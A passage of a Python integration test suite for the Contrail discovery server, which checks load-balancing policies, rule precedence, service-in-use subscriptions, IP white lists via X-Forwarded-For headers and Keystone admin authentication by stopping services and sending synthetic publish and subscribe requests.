result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy to 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
try:
self.logger.debug("\n # Verifying that discovery server do not do\n \
auto load balance for *IfmapServer* as policy is set to 'load-balance' #")
self.logger.info("\n # Stopping the IfmapServer on one of the config\n \
node until it looses all subscribers #")
self.inputs.stop_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
assert result
self.logger.info("\n # Starting the IfmapServer on one of the config node\n \
expecting that re-subscription will not happen again as auto load balance is off #")
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
client_status = self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of config server #")
result = False
assert result
self.logger.debug("\n # Waiting for 30 seconds to wait for restarted server\n \
to give time in case any client subscribes to this server. Not expecting this to happen #")
sleep(30)
self.logger.debug("\n # Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count=self.ds_obj.get_service_in_use(ds_ip, (self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #")
self.logger.error("# Total subscribers which got attached to restarted service are %d #"\
% count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_xmpp(self):
''' Validate that auto load balance works correctly for XmppServer.
This script also validates Bug 1395099 : Trigger subscription
from discovery client for faster convergence
Steps:
1. Verify that normal load balancing is working correctly by default
on Xmpp-Server.
2. Set auto load balance as *True* and stop any one of the Xmpp-Server.
3. Verify that stopped Server loses all it's subscribers.
4. Again start the Xmpp-Server which was stopped earlier.
5. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 XMPP Servers
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'XmppServer' #")
self.logger.info("# Stopping the XmppServer on one of the control node until it looses all subscribers #")
self.inputs.stop_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.logger.debug("# Waiting for 20 seconds to wait for server to lose all subscriptions #")
sleep(20)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
self.logger.info("## After XMPP server is made down, it looses all subscriptions within 20 seconds")
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
assert result
self.logger.info("\n# Starting the XmppServer on one of the control node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of control server #")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions#")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy as 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
try:
self.logger.debug("\n# Verifying that discovery server do not do\n \
auto load balance for *XmppServer* as policy is set to 'load-balance' #")
self.logger.info("\n# Stopping the XmppServer on one of the control \n \
node until it looses all subscribers #")
self.inputs.stop_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.logger.debug("# Waiting for 20 seconds to wait for server to lose all subscriptions #")
sleep(20)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
self.logger.info("## After XMPP server is made down, it looses all subscriptions within 20 seconds")
pass
else:
self.logger.error("\n# Even if Server is not running, it still has %d\n\
*in use* subscription. Something is wrong #" % count)
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
result = False
assert result
self.logger.info("\n# Starting the XmppServer on one of the control node\n \
expecting that re-subscription will not happen again as auto load balance is off #")
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of control server #")
result = False
assert result
self.logger.debug("\n# Waiting for 30 seconds for restarted server\n \
to give time in case any client subscribes to this server. \n \
Not expecting this to happen# ")
sleep(30)
self.logger.debug("\n# Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
pass
else:
self.logger.error("\n# Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #")
self.logger.error("# Total subscribers which got attached to restarted service are %d #"\
% count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_collector(self):
''' Validate that auto load balance works correctly for Collector.
Steps:
1. Set auto load balance as *True* and stop any one of the Collector.
2. Verify that stopped Server loses all it's subscribers.
3. Again start the Collector which was stopped earlier.
4. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 Collectors
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("#### Restarting the required subscriber services so that TTL takes effect immediately ###")
for ip in self.inputs.collector_ips:
self.inputs.restart_service('supervisor-analytics', [ip])
for ip in self.inputs.compute_ips:
self.inputs.restart_service('supervisor-vrouter', [ip])
for ip in self.inputs.bgp_ips:
self.inputs.restart_service('supervisor-control', [ip])
for ip in self.inputs.cfgm_ips:
self.inputs.restart_service('supervisor-config', [ip])
for ip in self.inputs.webui_ips:
self.inputs.restart_service('supervisor-webui', [ip])
for ip in self.inputs.database_ips:
self.inputs.restart_service('contrail-database', [ip])
self.inputs.restart_service('contrail-database-nodemgr', [ip])
client_status = ContrailStatusChecker()
client_status.wait_till_contrail_cluster_stable(self.inputs.host_ips)
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'Collector'#")
self.logger.info("# Stopping the Collector on one of the Analytic node until it looses all subscribers #")
self.inputs.stop_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running,\n \
it still has %d *in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
assert result
self.logger.info("\n # Starting the Collector on one of the Analytic node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of Collector#")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions #")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'Collector')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy as 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
try:
self.logger.debug("\n # Verifying that discovery server do not do\n \
auto load balance for *Collector* as it is set to load-balance #")
self.logger.info("\n # Stopping the Collector on one of the Analytic node\n \
until it looses all subscribers #")
self.inputs.stop_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
result = False
assert result
self.logger.info("\n # Starting the Collector on one of the Analytic node\n \
expecting that re-subscription will not happen again as auto load balance is off # ")
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of Collector #")
result = False
assert result
self.logger.debug("\n # Waiting for 30 seconds for restarted server\n \
to give time in case any client subscribes to this server. Not expecting this to happen #")
sleep(30)
self.logger.debug("\n # Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count = self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #" )
self.logger.error("# Total subscribers which got attached to restarted service are %d #" % count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rules_preferred_over_auto_load_balance(self):
''' Validate that rules always takes precedence over auto load balance.
Also verify that when rules are deleted, auto load balance takes its effect.
Steps:
1. Verify that normal load balancing is working correctly by default
on XMpp-Server.
2. Set auto load balance as *True* and stop any one of the Xmpp-Server.
3. Create multiple rules with single xmpp-server to subscribe to all
vrouter-agents in the topology.
4. Verify that rule is preferred over load balancing and no other
xmpp-server in the topology gets any subscription.
5. Delete the rules and verify that auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 XMPP Servers
Also, all XMPP Servers should be in different subnet
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='dynamic-load-balance')
self.logger.debug("# Waiting for 30 seconds to wait for auto load balance to happen #")
sleep(30)
try:
self.logger.info("# Verifying that discovery server is properly load balancing for 'XmppServer' # ")
load_balance = self.ds_obj.check_load_balance(ds_ip,'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("\n # Creating rules corresponding to *xmpp-server*\n \
so that all *contrail-vrouter-agent* on any network connects to\n \
*xmpp-server* running on cfgm0 #")
for i in range(0,len(self.inputs.compute_control_ips)):
rule_status = self.ds_obj.add_and_verify_rule(\
self.inputs.bgp_control_ips[0], 'xmpp-server',\
self.inputs.compute_control_ips[i], 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.info("#### Verifying that all vrouter-agents subscribe to control node xmpp-server only ###")
try:
in_use_list = []
for i in range(0,len(self.inputs.bgp_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use\
(ds_ip, (self.inputs.bgp_control_ips[i],'xmpp-server'))
in_use_list.append(in_use_list_elem)
if in_use_list[0] > 0 and sum(in_use_list[1:len(in_use_list)]) == 0:
self.logger.info("# Rule working as expected. All clients subscribed only to cfgm0 xmpp-server #")
self.logger.info("# Even if Auto load balance is *True*, rule is taking the priority #")
pass
else:
self.logger.error("\n# Even if rule is applied, rule is not working as expected.\n \
May be auto load balance being *True* is creating issue #")
self.logger.error("\n# It was expected that only cfgm0 xmpp-server\n \
will have subscriptions and rest of the xmpp-servers will not have any subscriptions #")
self.logger.error("\n# The *in-use* list for all xmpp-servers is %s#"\
% in_use_list)
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
rule_status = self.ds_obj.delete_and_verify_rule(\
self.inputs.bgp_control_ips[0], 'xmpp-server',\
self.inputs.compute_control_ips[i], 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
try:
self.logger.info("\n # Waiting for 60 seconds(2 TTL cycles)\n \
to wait for re-subscription and load-balancing to happen after deleting rules #")
sleep(60)
self.logger.info("\n # Verifying that discovery server \n \
auto load balance for 'XmppServer' as soon as rules are deleted #")
load_balance = self.ds_obj.check_load_balance(ds_ip,'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info(" # Deleting the policy configuration from contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="XMPP-SERVER")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_service_in_use_list(self):
''' Validate that subscribe request with instance value as 0 and having
service-in-use-list is considered a subscription request and
publishers are assigned to it properly.
Steps:
1. Get in-use count of publishers before sending a subscribe
request having service-in-use list
2. Send a subscribe request with instance value as '0' and
service-in-use list present in that subscribe request.
3. See if the in-use count of the publisher increases and client
get subscribed successfully.
Precondition: Assumption is that setup is having at least 3 Ifmap Servers
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params(operation='change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n# Verifying that if a subscriber has a service in use list,\n\
same publishers are assigned to it as mentioned in the list.# ")
self.logger.info("\n#### Getting the in-use count of all Ifmap Servers \n\
before sending dummy subscribe request ###")
in_use_list = []
for i in range(0,len(self.inputs.cfgm_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.cfgm_control_ips[i],'IfmapServer'))
in_use_list.append(in_use_list_elem)
sum_in_use_bfr_subscribe_request = sum(in_use_list)
self.logger.info("\n#### Total in-use clients subscribed to IfmapServer are %d #####"\
% sum_in_use_bfr_subscribe_request)
self.logger.info("\n#### Sending a dummy client request with instance value as 0\n\
to subscribe to IfmapServer #####")
self.logger.info("\n#### The dummy request will have a service-in-use-list \n\
containing IPs of all Ifmap Server present in the network #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="0", min_instances=len(self.inputs.cfgm_control_ips),\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr=self.inputs.compute_control_ips[0],client_type="TestClient",\
svc_in_use_list_present=True,svc_in_use_list=self.inputs.cfgm_control_ips)
sleep(2)
self.logger.info("\n#### Getting the in-use count of all Ifmap Servers \n\
after sending dummy subscribe request ###")
in_use_list = []
for i in range(0,len(self.inputs.cfgm_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use(ds_ip, \
(self.inputs.cfgm_control_ips[i],'IfmapServer'))
in_use_list.append(in_use_list_elem)
sum_in_use_aftr_subscribe_request = sum(in_use_list)
self.logger.info("\n Total in-use clients subscribed to IfmapServer after dummy request are %d"\
% sum_in_use_aftr_subscribe_request)
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id(\
ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id(\
ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.info("\n# The publishers mentioned in service-in-use list are %s\n\
and the client is actually subscribed to following publishers %s.######## " \
% (self.inputs.cfgm_control_ips,service_IPs))
if instances_allocated == len(self.inputs.cfgm_control_ips) and \
sum_in_use_aftr_subscribe_request > sum_in_use_bfr_subscribe_request:
self.logger.info("\n# The subscribe request with instance as 0 \n\
and service-in-use list has subscribed to expected publishers.######## ")
else:
self.logger.info("\n# Something went wrong. \n \
Expected Publishers not assigned to client request having service in use list ######## ")
result=False
self.logger.info("\n##### Waiting for 30 seconds so that dummy client request\n \
ages out and do not interfere with other test cases ######")
sleep(30)
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_white_list_security(self):
''' To prevent unauthorized publish or subscribe requests to effect
discovery server state (and assuming such requests are coming through
load-balancer such ha-proxy), discovery server to apply configured
publish and subscribe white-lists to incoming IP addresses as obtained
from X-Forwarded-For header.
Load-Balancer must be enabled to forward client's real IP address
in X-Forwarded-For header to discovery servers.
Steps:
1. Configure subscriber and publisher white list and save it in
contrail-discovery.conf file.
2. Send publish/subscribe requests with X-Forwarded-for headers with
IPs same as present in white list
3. Verify that publish/subscribe requests are processed correctly
by discovery server
4. Send publish/subscribe requests with X-Forwarded-for headers
with IPs not present in white list
5. Verify that publish/subscribe requests are rejected by discovery server.
6. Delete the white list configurations from contrail-discovery.conf file.
7. Send publish/subscribe requests with X-Forwarded-for headers
with IPs not present in white list
8. Verify that publish/subscribe requests are processed correctly
by discovery server
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n # Configure white list for publishers\n \
and subscriber in contrail-discovery.conf file # ")
self.ds_obj.white_list_conf_file("publisher", '1.1.1.0/24', '2.2.2.0/24')
self.ds_obj.white_list_conf_file("subscriber", '1.1.1.0/24', '2.2.2.0/24')
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json'\
, 'X-Forwarded-For': "1.1.1.1"}
self.logger.info("Sending a synthetic publish request to verify publishers white list")
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_1",ip="1.1.1.1", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip, service="Test_Pub_1")==[]:
result = False
self.logger.error("\n#### Failure!! The requested publish request\n\
not accepted by discovery server even if the IP was present in\n \
Publisher white list ###")
else:
self.logger.info("\n#### Success!! The requested publish request\n\
accepted by discovery server as IP was present in Publisher white list")
sleep(2)
DiscoveryServerUtils.POST_HEADERS = {'Content-type': 'application/json',\
'X-Forwarded-For': "3.3.3.3"}
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_2",ip="3.3.3.3", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip,\
service="Test_Pub_2") == []:
self.logger.info("\n#### Success!! The requested publish request\n\
not accepted by discovery as IP was not present in Publisher white list")
else:
result = False
self.logger.error("\n#### Failure!! The requested publish request\n\
accepted by discovery server even if the IP was not present in Publisher white list")
self.logger.info("Sending a synthetic subscribe request to verify subscribers white list")
DiscoveryServerUtils.POST_HEADERS = {'Content-type': 'application/json',\
'X-Forwarded-For': "2.2.2.2"}
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2", client_id=self.inputs.compute_names[0]+\
":TestClient_1",remote_addr=self.inputs.compute_control_ips[0],\
client_type= "TestClient_1")
if self.ds_obj.get_subscribed_service_id(ds_ip,client=(\
self.inputs.compute_control_ips[0], "TestClient_1"),\
service="IfmapServer") == []:
result = False
self.logger.error("\n#### Failure!! The requested subscribe request\n\
not accepted by discovery server even if the IP was present\n\
in Subscriber white list ###")
else:
self.logger.info("\n#### Success!! The requested subscribe request\n\
accepted by discovery server as IP was present in Subscriber white list")
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json',\
'X-Forwarded-For': "3.3.3.3"}
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2",client_id=self.inputs.compute_names[0]+
":TestClient_2",remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient_2")
if self.ds_obj.get_subscribed_service_id(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient_2"), service="IfmapServer") == []:
self.logger.info("\n#### Success!! The requested subscribe request \n\
not accepted by discovery server as IP was not present in Subscriber white list")
else:
result = False
self.logger.error("\n#### Failure!! The requested subscribe request\n\
accepted by discovery server even if the IP was not present in Subscriber white list")
self.logger.info("Deleting the configurations of white list to clean up for next test case")
assert self.ds_obj.modify_discovery_conf_file_params( 'delete_white_list',\
publish=True, subscribe=True)
self.logger.info("\n# Verify that when white list is deleted, \n\
then X-Forwarded-Header does not hold relevance and all requests are accepted")
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_2",ip="3.3.3.3", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip, service="Test_Pub_2") == []:
result = False
self.logger.error("\nFailure!! The requested publish request \n\
not accepted by discovery server even after deleting publish white list")
else:
self.logger.info("\n#### Success!! The requested publish request\n\
accepted by discovery server as Publisher white list has been deleted")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2",client_id=self.inputs.compute_names[0]+\
":TestClient_2",remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient_2")
if self.ds_obj.get_subscribed_service_id(ds_ip,client=(self.inputs.compute_control_ips[0],\
"TestClient_2"), service="IfmapServer") == []:
result = False
self.logger.error("\nFailure!! The requested subscribe request\n\
not accepted by discovery server even if Subscriber white list has been deleted")
else:
self.logger.info("\nSuccess!! The requested subscribe request\n\
accepted by discovery server as Subscriber white list has been deleted")
self.logger.info("\nWaiting for 30 seconds so that dummy client request\n\
ages out and do not interfere with other test cases ######")
sleep(30)
except Exception as e:
self.logger.error(e)
result = False
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json'}
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_keystone_auth_security(self):
'''
Discovery server to require admin keystone credentials to perform
load-balance and setting of admin state. Discovery server will expect
admin token in X-Auth-Token header of incoming request. The token
is sent to keystone for validation and action is only performed if a
valid admin token is present. Otherwise 401 HTTP code is returned
Steps:
1. Configure authentication as keystone in contrail-dicovery.conf file.
Don't configure the credentials
2. Attempt admin-state change, oper-state change and load-balance
trigger and expect them to fail as only auth has been configured.
3. Configure authentication as keystone in contrail-dicovery.conf file.
Configure the credentials as well.
4. Attempt admin-state change, oper-state change and load-balance
trigger and expect them to pass as auth and it's credentials has
been configured.
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.info("# Configure authentication as *True* in contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params('add_keystone_auth',\
auth="keystone", add_values = "False")
self.logger.debug("#Verify that all requests fails if Auth is True and credentials are not mentioned#")
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="oper-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response != 200:
self.logger.info("\nSuccess!! As authetication is True and credentials are not configured,\n\
the oper-state change request has failed")
else:
self.logger.error("\nFailure!! Even if authetication is True and credentials are not configured,\n\
the oper-state change request is successful")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="admin-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response != 200:
self.logger.info("\nSuccess!! As authetication is True and credentials are not configured,\n\
the admin-state change request has failed")
else:
self.logger.error("\nFailure!! Even if authetication is True and credentials are not configured,\n\
the admin-state change request is successful")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="load-balance",service_id=\
self.inputs.cfgm_names[0],service_type="IfmapServer")
if response != 200:
self.logger.info("\n Success!! As authetication is True and credentials are not configured,\n\
the load-balance request has failed")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are not configured,\n\
the load-balance request is successful")
result = False
self.logger.info("\n # Configure authentication as *True* as well as \n \
configuring all the required credentials in contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params(operation='add_keystone_auth',\
auth="keystone", add_values = "True")
self.logger.info("\n # Verify that all requests are passed if Auth is True\n\
and credentials are mentioned # ")
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="oper-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the oper-state change request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the oper-state change request has failed")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip\
,operation="admin-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the admin-state change request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the admin-state change request has failed")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="load-balance",service_id=\
self.inputs.cfgm_names[0],service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the load-balance request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the load-balance request has failed")
result = False
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("# Deleting the auth configurations from contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params(operation='delete_keystone_auth'\
,auth="keystone")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_policy_fixed(self):
'''
This test case is specifically written to automate Bug "#1401304 :
discovery fixed policy breaks if service stays down for extended period"
Discovery has fixed policy for service assignment in which services
are assigned to consumers in a fixed, static or constant manner.
For example if there are "n" publishers of a service and there are
"m" consumers that are interested in "k" instances (say 2) of service,
then all "m" consumers will get <n0, n1, n2 ... nk> service instances.
This is akin to priority order.
If an instance, say "ni" such that 0 <= i <= k went down for an
extended period (> 15 seconds) and comes back up, it should no longer
be assigned to a new consumer because it should go to the bottom of
the prioritized list.
It should not retain its position.
Steps:
1. Set the policy of publisher named TEST_PUB as fixed in
contrail-discovery.conf file.
2. Create 3 different synthetic Publisher request of Publisher named
TEST_PUB.
3. Create 3 different synthetic Subscribe request asking for 2 instances
of TEST_PUB each. Verify that policy as fixed works as expected.
4. Now make one of the publisher which was used by subscribers as
down for more than extended period.
5. Again send 3 different synthetic requests asking for 2 instances
each and verify that the publisher which was made down is not
assigned to the clients as it's priority got reduced in the earlier step.
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params(operation='change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("#### Making policy as *fixed* for test publisher ##")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="TEST_PUB",policy='fixed')
self.logger.info("#### Sending 3 synthetic publish requests of same Publisher type ###")
def publish_request():
for i in range(0,100):
response_1 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="1.1.1.1",port="123")
